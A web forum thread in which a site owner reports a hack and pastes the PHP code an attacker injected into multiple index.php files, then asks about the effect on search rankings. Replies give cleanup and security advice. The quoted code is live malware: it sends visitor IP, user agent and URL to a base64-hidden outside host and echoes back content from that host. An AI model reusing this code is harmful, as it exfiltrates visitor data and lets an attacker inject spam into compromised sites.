Website has been hacked will this hurt ranking
-
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files:
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings.
My first question : Will this hurt my rankings ?
Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this.
Grtz,
Ard
-
I'm using joomla sites. I now know how they got into our sites. We had malware on one of the computers, and apparantly keeps filezilla the passwords in a text files without encryption. I have changed all the comprimised files back, and changed every password on the sites. The hack changed every index and footer file. Let's hope it doesn't came back.
-
If you are using wordpress, I would be inclined to reinstall the base files, or restore from a backup to a time prior to the hack (if you have not made many changes since).
I would also recommend the wordpress security plugin, change all passwords to strong ones etc.
Don't just fix the problem, but secure your site against it happening again as well.
-
Hi Jonathan,
Luckily I haven't seen any changes in rankings in the last weeks. Let hope it stays this way.
I did find files that were changed on the 10 of September.
Google hasn't identified my site as being hacked.
Is there anything else I can do?
-
I have read elsewhere that it impacts what search engines see, so will insert backlinks to other sites which only show to the crawlers. You, or anyone else visiting the site would not notice anything different. Its a very sneaky hack.
This would potentially affect your site rankings. Apart from PR leakage, if they are linking to bad domains etc Google might not look kindly on it.
Just remove the offending code \ hack, and things should slowly get back to normal though as your site is recrawled. Have you noticed a change in your rankings? If you sort it quickly, I doubt you will need to do anything, but remove the hack.
Has Google identified your site as being hacked? If they have follow these steps including request they review the site at the end: http://www.google.com/webmasters/hacked/
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Does same description in the directories of all affect SEO or not? - But unique on the website
Hi, I would like to do some directories. When I checked with a person for his recent work, he has given the same description in 50 directories he has done for a client. Does this affect SEO or not?
White Hat / Black Hat SEO | | AnuManish0 -
Chrome79 shows warning on our domain "Did you mean...?" another website
On Chrome79 a large scary warning is shown to users on our site: "Did you mean this other domain? This site's domain looks similar to X domain. Attackers sometimes mimic sites by making small, hard-to-see changes to the domain." Screenshot: https://imgur.com/a/NOGEyLM Our online business is reputable, no black hat SEO practices, has been established since the early 2000s, with a relatively high DA. We don't have any warnings / manual actions in Google Search Console so I can't request a review there. I've reported it several weeks ago to Google's Incorrect Phishing Warning but the warning continues to display. I reported using: google.com/safebrowsing/report_error/ Does the Moz community have any suggestions on how to fix this or general thoughts? Thanks! NOGEyLM
White Hat / Black Hat SEO | | sb10300 -
We've just completed a company video. Should we post it everywhere at once, or stagger on various channels (YouTube, website, LinkedIn, Facebook...)
Hopefully we'll get a lot of traffic from our new corporate video. If we post it everywhere at once, will we get a spike in our analytics, and if so, will it be seen by Google as an anomaly, or even suspicious. If we spread out the distribution over several channels over a little time, should we get a longer bump. In either instance, we may consider a sharing schedule to promote it over time.
White Hat / Black Hat SEO | | SteveMauldin0 -
Increase in spammy links from image gallery websites i.e. myimagecollection.net
Hi there I've recently noticed a lot of spammy links coming from image gallery sites that all look the same, i.e.: http://mypixlibrary.co/ http://hdimagegallery.net/ http://myimagecollection.net/ http://pixhder.com/ Has anyone else seen links from these? They have no contact details, not sure if they are some form of negative SEO or site spam. Any ideas how to get rid? Thanks
White Hat / Black Hat SEO | | Kerry_Jones0 -
Why Link Spamming Website Coming on First Page Google?
As we all already know about link spamming. As per Google Guidelines Link building, Exact Keywords Anchor Link Building is dead now but i am looking most of the website coming on first page in Google doing same exact keywords linking. I think directory, article, social bookmarking, press release and other link building activity is also dead now. Matt always saying content is more important but if we will not put any keywords link in content part then how website rank in first page in Google. Can anybody explain why is website coming on first page because when i am doing same activity for quality links with higher domain authority website then we are affected in Google update.
White Hat / Black Hat SEO | | dotlineseo0 -
Secondary Domain Outranking Master Website
IEEE is a large professional association dedicated to serving engineers. The IEEE Web Presence is made up of flagship sites like IEEE.org, IEEEXplore, and IEEE Spectrum, mid-tier sites like Computer.org, and smaller sites like those dedicated to specific conferences. It is unclear exactly when this started - but searches in Google for [ieee] currently return ieeeusa.org before ieee.org. This is troublesome, as users are typically looking for IEEE.org with such a general query. ieeeusa.org is a site that has a much narrower focus - it is dedicated to public policy. IEEE.org is one of the strongest domains - I am thinking that this is a glitch of some sort. I am removing a stale sitemap that is referenced in robots.txt (though again, I'm not seeing any issues with other pages - its just two queries that are trouble: [ieee] and [about ieee]. And its noticeable in analytics 🙂 http://ieee.d.pr/hMg0/YhklCw7Z What do you think? 🙂
White Hat / Black Hat SEO | | thegrif3290 -
Website "A Record" in DNS - Geotargetting
Hi, Our online shop is hosted with a French IP address. It is available in English and Spanish. I have noticed, as to be expected, that we get quite a few french visitors, probably related to our IP address Google must think its geo related. We don't want to particularly target any specific country, but more so english and spanish speakers. Can you have various A records around the world to help with this? Any suggestions or things I could look into?? thanks
White Hat / Black Hat SEO | | bjs20100 -
Ever seen a black hat SEO hack this sneaky?
A friend pointed out to me that a University site had been hacked and used to gain top Google rankings. But it was cloaked so that most users wouldn't notice the hack. Only Googlebot and visitors from Google SERPs for the spam keywords would see a hacked version. See http://www.rypmarketing.com/blog/122-how-hackers-gained-an-easy-1-google-ranking-using-a-university-website.whtml (my blog) for screenshot and specifics. I've dealt with hacks before, but nothing this evil and sneaky. Ever seen anything like this? This is not our client, but was just curious if others had seen a hack like this before.
White Hat / Black Hat SEO | | AdamThompson0